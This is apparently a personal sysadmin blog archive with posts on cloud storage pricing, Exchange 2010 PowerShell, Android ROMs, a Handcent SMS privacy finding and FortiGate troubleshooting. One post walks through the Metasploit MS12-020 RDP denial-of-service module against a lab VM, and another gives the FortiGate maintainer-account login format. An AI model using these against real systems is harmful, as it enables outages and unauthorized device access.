Apr 26 2012

Battle of the cloud storage providers

With the recent show and tell of Google’s GDrive cloud storage solution its now painfully obvious that other cloud storage providers in that arena is scrambling for fear of lost of business.  As we all know Google has a track record of coming out with solutions to rivals the competitors and usually end up being the victor. This market is getting very popular over the last few years and statically it has been proven that users that started off as a free users will eventually become paying customers so the key is to get as much free users as possible.

For the last year or so the words “free cloud storage” was almost synonymous with “Dropbox”, even on the mobile platform their application was widely accepted now with Google finally in the arena its going to be interesting to see how others will start to change their business model. I have recently received some form of communication form the following providers of (Skydrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of them and see how the might stack-up  to GDrive.

Lets start with GDrive, they are offering a 5 GB free for new users,  has a mobile application (Android devices), GDocsDrive desktop client, allows all of the average features (upload, share, collaborate),  and as of now it appears they have a 10GB file size upload limitation. The other interesting thing about this is the fact that to upgrade to 25 GB a month it will only cost you $2.50, or 100GB for just $4.99/mo. The one reason that I believe the might capture a large piece of market share is simply based on their name and the fact that they have a solid infrastructure and should be able to handle larger traffic than the average provider in this sphere.

Next is Dropboxwhich is a free service that lets you bring all your photos, docs, and videos anywhere. This means that any file you save to your Dropbox will automatically save to all your computers, phones and even the Dropbox website. The start off with 2GB free and additional 500 MB per referral, now the paid model starts with 50 GB for $10/mo, and has a file size upload limit of 2GB however if you upload files via the website you have a 300 MB cap.

Skydrive, who has been trying to gain popularity for a while and at one point offered you 25GB free storage recently restructured and is only offering 7GB free for all new users, you had the option to keep your  25GB if you were a old users but you had to log in and claim it before April 22 which has already passed. If you require more space and you love Skydrive you can get 20GB/$10yr or 100GB for $50/yr. As of now Skydrive offer the most free space and the most value for your money per space annually.

Box is another competitor who tried recently to gain new users by offering mobile users 50GB free for life if the signed up from their mobile device. If you don’t use this option you can always get 25GB for $10/mo or 50GB for $20/mo. They have a few downfalls, the have  a 200MB file upload cap, and of course the only offer a desktop client solution business/enterprise users only.

Last on my list is Ubuntu One who currently offer your standard 5GB for free users and you can get an additional 20GB for $3/mo or $30/yr. The good thing about this is you are getting a good value for your money however I don’t think the do a good job marking this product and as such I believe the might fade into the background amidst all the other big names out there.

For a great overview of some of the services mentioned above you can take a glance at this  comparison image I found over at PCWorld

What services are you using?

Mar 24 2012

MS12-020 RDP Vulnerability overview and testing


By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; “This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.”

In short the system would crash and have a “blue screen of death” thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that’s not because the choose to be however most places have a  “patch cycle” which require extensive testing prior to deployment.

As explained by the fine people over at ISC Diary The Microsoft released patch has several reference KB’s which includes ” KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you’ll see on a Windows system, when installed, depends on the version of the OS you’re running. For Windows 7 you’ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.
We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of Metasploit follow the steps below.
 My Test setup:
  • Linux (SolusOS)
  • VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT  3389             yes       The target port

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf  auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 – 210 bytes sent
[*] 192.168.2.10:3389 – Checking RDP status…
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = The vulnerable host that is running a vulnerable version of RDP

Screenshot of server 2008 reacting to the exploit
Now go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.

Mitigation:

http://isc.sans.edu/diary.html?storyid=12808

http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

http://technet.microsoft.com/en-us/library/cc732713.aspx

Mar 20 2012

SendAs from a distribution group Exchange 2010

I received a request today from one of our users who wanted to send and email from their departmental distribution group. Now this task can be easily performed if a user wanted to do a send as from a public folder however with Exchange 2010 you are unable to grant a user the correct access via the EMC.

In order to grant a user this access you have to do it via the Exchange management shell “EMS” aka PowerShell. My first question was did the user really meant to say Public folder or was it an actual DG? To answer this question I ran the following command:

get-recipient -results unlimited | where {$_.emailaddresses -match “[email protected]”} | select name,emailaddresses,recipienttype

Once I realized that I was working with a distribution group I then ran  this command to grant the user “send as ” permission:

Get-DistributionGroup “accounting” | Add-ADPermission -ExtendedRights Send-As -User “Jane Doe” -AccessRights ExtendedRight | fl

And just like that I had another satisfied user :). If you know of another way to accomplish this task do share in the comments.

Mar 09 2012

DroidNation podcast appearance

 

 

 

About a week or two ago I appeared on a pretty awesome podcast called DroidNation (eps 15).  DroidNation is basically the podcast for anyone that is looking to take back control of their device, from rooting to roming to overclocking you name it the got it. Every episode leaves you wanting for more. During my segment I spoke a bit about Android security, you can get the show notes here.

In short if you have not heard about  frostbite media network or DroidNation go out and add it to your podcast app  and have fun unlocking the power of your Android system.

Jan 25 2012

Retention policy with a twist of MRM Exchange 2010

I was recently working on a project that involved creating some Retention policies for our Exchange 2010 sp1 environment. The project got a bit scary in the testing phase when we realized that the Inbox deletion policies were also deleting emails in the user’s sub-folder.  The came as a surprise to us since we were able to use the same type of policy in Exchange 2003 prior to upgrading.

To solve this issue we had to create retention policies to manage our deleted items, sent items, and drafts but use message record management to handle our inbox. Since MRM was being phased out of 2010 this solution needed to be implemented via the Exchange management shell (Powershell).

Implementing MRM:

Messaging records management (MRM) is the records management technology in Microsoft Exchange Server 2010 that helps organizations reduce the legal risks associated with e-mail. MRM makes it easier to keep the messages needed to comply with company policy, government regulations, or legal needs, and to remove content that has no legal or business value.

Prior to implementing this its best to check to see if any additional policies were created and if you don’t play on using them going forward delete them. You can do so with the below commands:

Review commands:

ManagedFolderMailboxPolicy

 [PS] C:\Windows\system32>Get-ManagedFolderMailboxPolicy

Name                      ManagedFolderLinks

—-                              ——————

Test Policy1            {Inbox}


ManagedContentSettings

 [PS] C:\Windows\system32>Get-ManagedContentSettings

 Name                      MessageClass              ManagedFolderName

—-                            ————- ————              —————–

Inbox Content               *                                           Inbox1


ManagedFolder

 [PS] C:\Windows\system32>Get-ManagedFolder

 Name                      FolderName                Description

—-                              ———-                ———–

Inbox1                    Inbox                     ManagedDefaultFolder

After retrieving this information you can now issue the following commands to remove any old or test policy:

Remove Policy from users

Set-Mailbox username -ManagedFolderMailboxPolicy $null

Removed ManagedFolder Mailbox Policy

[PS] C:\Windows\system32>Remove-ManagedFolderMailboxPolicy “Test Inbox Policy”

Remove Manage Content Setting

 [PS] C:\Windows\system32>Remove-ManagedContentSettings “Inbox Content”
Creating and Implementing MRM:

  1. Create your managed folder
  2. Create your managed folder content setting
  3. Create your manage mailbox folder policy
  4. Apply your policy to a user or to an exchange data store.
  5. Start the managed folder assistant service or wait for it process on schedule

The below policy will delete all emails from the user mailbox that are 60 days old without touching any sub folders in the user’s Inbox.

Managed Folder Creation

 New-ManagedFolder -Name “Test Inbox” -DefaultFolderType Inbox -BaseFolderOnly $true -Comment “Items would be moved to deleted items for 60 days” -MustDisplayCommentEnabled  $true

Managed Folder Content Settings

New-ManagedContentSettings -Name “Test Content” -FolderName “Test Inbox” -MessageClass * -AgeLimitForRetention 60 -RetentionAction MoveToDeletedItems -RetentionEnabled $true -TriggerForRetention WhenDelivered

 Managed Mailbox Folder Policy

New-ManagedFolderMailboxPolicy -Name “TestPolicy” -ManagedFolderLinks “Test Inbox”


Verify settings

[PS] C:\Windows\system32>Get-ManagedFolderMailboxPolicy “TestPolicy” |fl

[PS] C:\Windows\system32>Get-ManagedContentSettings “Test Content”|fl

[PS] C:\Windows\system32>Get-ManagedFolder “Test Inbox” |fl

 

Start the Managed Folder Assistant to process the mailbox.

Apply to single user:

 Set-Mailbox -Identity testuser -ManagedFolderMailboxPolicy “TestPolicy”

Start-ManagedFolderAssistant -ID  testuser

Apply to a database level:

Get-Mailbox –database “Database Name” | Set-Mailbox –ManagedFolderMailboxPolicy “Name of the Policy”

Tip:

If you run into issues wait about 30 mins for the folders to replicate after created them. You can also stop and restart the “Managed Folder Assistant” service.

 

Would love to know how others handled this issue.

References:

http://technet.microsoft.com/en-us/library/bb508901%28EXCHG.80%29.aspx
http://technet.microsoft.com/en-us/library/dd335093.aspx

Jan 18 2012

Podcast Appearance “Attack of the Android”

Hello all, I hope your year is going well so far; I just wanted to drop a line and mention that a few weeks ago I appeared on “Attack of the Androids” podcast esp 16. A little background about the podcast, the are a weekly audio podcast focused on the Google Android operating system and community.

You can find them on Google + or follow them on twitter @aotaradio    kool cast check them out!

Jan 04 2012

Handcent SMS logging your sent messages:Update

I first posted about this issue back in Dec 18th of 2011, Handcent SMS one of the most popular SMS applications on the android market with over 10,000,000 downloads was doing some things that raised a few privacy questions.  As stated in my last post Handcent was  logging all your sent messages even after you deleted them from within the application.

I tried contacting them via email and twitter but the refused to comment on my findings. However 5 days later to my amazement I noticed the released a new version “3.9.9.9”. Take a look at the change log:

    • #3.9.9.9
    • Improve Galaxy Nexus (Android 4.0) support
    • New Skin for XMas 2012,Cool.
    • Add auto delete old message option
    • Add Mms signature option
    • Merry XMas to all users

Now after installing the new version I noticed I was still able to see my sent messages after I deleted them so I am not so certain the issue was addressed. I would however like to know if “Add auto delete old message option

means the will purge the messages from the database on a random schedule at some point. Again since Handcent refuse to comment on this issue we can only assume for now.

Don’t think that all hope is lost or that you are stuck with the stock messaging application, thanks to brilliant mind of Moxie Marlinspike and others over at Whisper System, “TextSecure Beta” was birthed on Dec 21, 2011.

TextSecure is a security enhanced text messaging application that serves as a full replacement for the default text messaging application. Messages to other TextSecure users are encrypted over the air, and all text messages are stored in an encrypted database on the device. If your phone is lost or stolen, your messages will be safe, and communication with other TextSecure users can’t be monitored over the air.

In short if you are ready to give up on Handcent this might be a good alternative, I know so far I feel much more secure using this application. I even tried browsing the db and I can confirm that the messages are indeed encrypted.

Dec 18 2011

Handcent SMS logs all your sent messages

In light of all the CarrierIQ press I started wondering what others applications on my phone might be doing things that I am not aware of. So I installed SQLite Editor and started poking around my phone, that’s when I decided to see what my sms client “Handcent” was up too. Since I wanted to view my out on a bigger monitor I fired up a adb shell and used SQLite see what Handcent sms was hiding under the hood.

I used the following command to search my /data/data folder on my device to look for any files with a .db extension since that indicated it was a database file.

adb shell find /data -name *.db

As you can see I found several databases on my phone but today
we will be looking at one in particular. Handcent's "hc_sms.db".

For this part we will use sqlite to view the database layout (schema)
and its contents:

sqlite> .schema
CREATE TABLE DELIVERY_REPORT (MESSAGE_ID INTEGER Primary KEY,TIMESTAMP text,UPDATE_TIMESTAMP text);

CREATE TABLE SEND_LOG (ID Integer Primary KEY,SID INTEGER ,SEND_TYPE INTEGER,BEGIN_SEND_TIME text,END_SEND_TIME text,SEND_CONTENT TEXT,
SENDING_PERSON_NUBER INTEGER,SUCCESS_NUMBER INTEGER,FAIL_NUMBER INTEGER);

CREATE TABLE SEND_LOG_DETAIL (SID INTEGER,PID INTEGER,BEGIN_SEND_TIME TEXT,END_SEND_TIME TEXT,PERSON_NAME TEXT,PERSON_NUMBER TEXT,SENDI
NG_MESSAGE_NUMBER INTEGER,SENT_SUCCESS_NUMBER INTEGER,SENT_FAIL_NUMBER INTEGER);
CREATE TABLE android_metadata (locale TEXT);

sqlite> .tables
DELIVERY_REPORT   SEND_LOG          SEND_LOG_DETAIL   android_metadata
sqlite>

And now after doing a select * from SEND_LOG; to my amazement
I saw all my text messages that were sent since I installed
the handcent application both
DELETED and undeleted.

Also looking at select * from SEND_LOG_DETAIL I saw the same
information but this log also held the receiver of the sms name
and phone number.

Now my question is, if I am deleting a message and thinking
its being deleted why would handcent chose to keep a copy of
this message in an unencrypted database where anyone can access
it? I would love to hear from them and try to understand why
this is being done.

Dec 15 2011

My first expirience at installing a custom rom

  So after having my Droid Bionic for a few months now I have decided to take the leap from rooting to roming. A quick definition on Rooting and Roming from the nice people over at droidlessons.com:

What is Rooting?

“Rooting” your device means obtaining “superuser” rights and permissions to your Android’s software. With these elevated user privileges, you gain the ability to load custom software (ROM’s), install custom themes, increase performance, increase battery life, and the ability to install software that would otherwise cost extra money (ex: WiFi tethering). Rooting is essentially “hacking” your Android device. In the iPhone world, this would be the equivalent to “Jailbreaking” your phone.

Custom Software (ROM’s)

You may have heard of people loading custom “ROM’s” on their devices. A “ROM” is the software that runs your device. It is stored in the “Read Only Memory” of your device. There are many great custom ROM’s available that can make your Android device look and perform drastically different.

After hanging around rootzwiki forum, listening to Droid Nation and Android App Addictspodcast I felt like I was ready to install my first custom  rom. My rom of choice was [K]IN3TX v1.0 some features about this rom:

  • Latest BusyBox
  • Superuser (Updated Binary)
  • Battery Optimization
  • Fully ROOTED
  • SD Card Read tweaks
  • Built Off of 5.8.894 OTA
  • Advance Power Menu
  • Scrollable Power Toggles in Pull Down
  • FULL Custom UI
  • PNG Optimization
  • init.d Run Support

Just to name a few..

You can read the full posting about this rom over at the rootzwiki forum their you will also find the various downloads that you would need. However I will highlight a few steps I took:

After you are finish installing log-in setup your device, then you can boot back into CWM wipe your cache, and dalvik then install add-on or tpak of your choice, I installed the ICS tpak.

Now as anyone might expect the first time you are doing something like this you have to realize that you might make a mistake, but you can only hope it doesn’t hurt you too much. The mistake I made was that I copied the wrong add-on pack to my sdcard but not the base rom, and since I already wiped my system partition I was unable to reboot my phone into recovery mode after I copied the correct file via another device.

How I corrected this issue you might ask yourself, I had some help from my buddy Highlander-:  over at the Podnutz IRC chat room. He pointed me to a tool call RSDlite, which allowed me to flash my phone back to the stock rom and from there I followed the steps outlined above and all was well the second time around :). You have got to love the power of the Internet and great communities.

Have fun roming and you can comment back and let me know which rom is your favorite. I have only tried one and I must say I absolutely love it!

Reference Links:

http://droidlessons.com/what-is-rooting-on-android-the-advantages-and-disadvantages/
http://forum.xda-developers.com/showthread.php?t=1348587

http://www.addictivetips.com/mobile/unbrick-motorola-droid-bionic-with-rsd-lite-5-5-guide/

 

 

Dec 06 2011

Troubleshooting FortiGate 100A Connectivity Issue

Objective:  I goal of this document is meant to outline a few steps that will allow you to troubleshoot the cause behind why users were unable to access the internet while behind a Fortigate 100A device.

Problem: I received a ticket today stating that users in one our computer labs were unable to access the internet.

After arriving onsite I discounted the device and plugged directly into the ISP link and confirmed that they were no issues with the ISP connection. Now is time to open a ticket with support and start the series of troubleshooting to figure out the root cause of the issue.

Step one: Information gathering

After opening the ticket I was told that the issue could have possibly been caused by a bad firmware image, or a corrupted configuration. I needed to log into the device to find out more information and the only way to do so was via the console port.

Connecting to the Fortigate 100A console port:

  • Start your favorite terminal emulator program use the following settings:
    • Baud rate: 9600
    • Data bits: 8
    • Parity: None
    • Stop bit: 1
    • Flow control: None
  • Next, reboot the device and watch the screen for any error message.

 

After rebooting the first time I got the following message, “You must format the boot device”,  I then rebooted a second time and got the following message “The config file may contain errors, Please see details by the command ‘diagnose debug config-error-log read”.  This was somewhat good news because I would have had to RMA the device if the system RAM was corrupted.

At this point I know I had the following options:

  • Backup the current configs
  • Reset the device to it’s default state
  • Reload a new configs

Backing up the device to USB via the console port:

  • Plug a usb device into one of the ports on the back of the device
  • Login to the device, if you are unable to use your admin login you can login with the maintainer account, this account is only valid for 30 sec after the device has been rebooted; so copy the username and password to a text file then cut/paste to the console. Username: maintainer Password: bcpb<input device serial number using uppercase letters>
  • Issue the following command: execute backup configs usb filename<use any name here>
    FG100 # execute backup full-config usb fg100a-10-15-11
    Please wait…
    Copy onfigs fg100a-10-15-11 to USB disk …
    Copy onfigs file to USB disk OK.
    Setting timestamp

Before reloading a new configs its best to run a few diagnostic commands to try and understand what happened:

FG100 #  diag sys top –> Look at CPU load and any processor that running hot

FG100 # diag debug crashlog –> Look for clues as to what service crashed

          Ex Output:

89: 2011-11-14 16:06:42 <04434> application cmdbsvr

 290: 2011-11-14 16:06:42 <04434> *** signal 7 (Bus error) received ***

 291: 2011-11-14 16:06:42 <04434> Register dump:

298: 2011-11-14 16:06:42 <04434> Backtrace:

 299: 2011-11-14 16:06:42 <04434> [0x0893277b] => /bin/cmdbsvr 

 300: 2011-11-14 16:06:42 <04434> [0x08932a96] => /bin/cmdbsvr 

 301: 2011-11-14 16:06:42 <04434> [0x08910473] => /bin/cmdbsvr 

 

Reload new configs via console port:

  • Rename your most recent backup configs file to fgt_system.conf, then place file on the root of your USB drive.
  • Plug the USB into one of USB ports on the back of the unit and reboot the unit and you should see a similar output:

 

Reading boot image 1370111 bytes.
Initializing firewall…
System is started.
Get image from USB disk …Can not get image from USB disk.
Get config file from USB disk OK.
File check OK.

The system is going down NOW !!

 If you are not certain and you leave the drive in after the system reboots you will see the following message indication that the configs file on the disk is the same as the file on the system.

 Get config file from USB disk OK.
Checksum check synced! Don’t need restore config.

 

 Additional Troubleshooting:

After I restored the config file I was still unable to connect out to the internet, so I issued the following command to verify my IP address setting:

FG100A # get system interface  

After discovering that the IP address for my external interface WAN1 had a different subnet than the one I wrote down previously when I connected directly to my ISP modem with my PC. I decided to change the interface type to DHCP.

 

Configuring external interface for DHCP:

FG100A #  configs system interface –> To enter into Interface config mode

FG100A (interface) # edit wan1 –> Choose your external interface in our case it was wan1

FG100A (wan1) # unset ip –>  Removing current static IP entry

FG100A (wan1) # set mode dhcp –> To change mode to DHCP from static

FG100A (wan1) # show –> To confirm that the change was made

config system interface
edit “wan1″
set vdom “root”
set mode dhcp
set allowaccess https ssh fgfm
set type physical
next
end

 FG100A (wan1) # end

 I was now able to access the internet!!

Discovering what happened:

Wrap-up:

Given that the logs were lost due the fact the FortiGate was reset and the unit is storing it’s logs in RAM, I can’t diagnose the exact cause. But we did see in the Crashlog “diag debug crashlog read”, which is written to flash that the cmdbsvr was crashing. We have identified a issue with cmdbsvr on the version of fortios on your fortigate.

Bug #’s : 117281, 144277
Summary : cmdbsvr crash in conserve mode may cause configuration loss

I updated the device to MR3 patch 2, since this version addressed the issue.
Reference Documentation:

http://emea.fortinet.net/fortinet/bht/index.php

http://bit.ly/uRSdYJ

http://docs.fortinet.com/fscan/fortiscan_cli_40.pdf

Alibi3col theme by Themocracy

css.php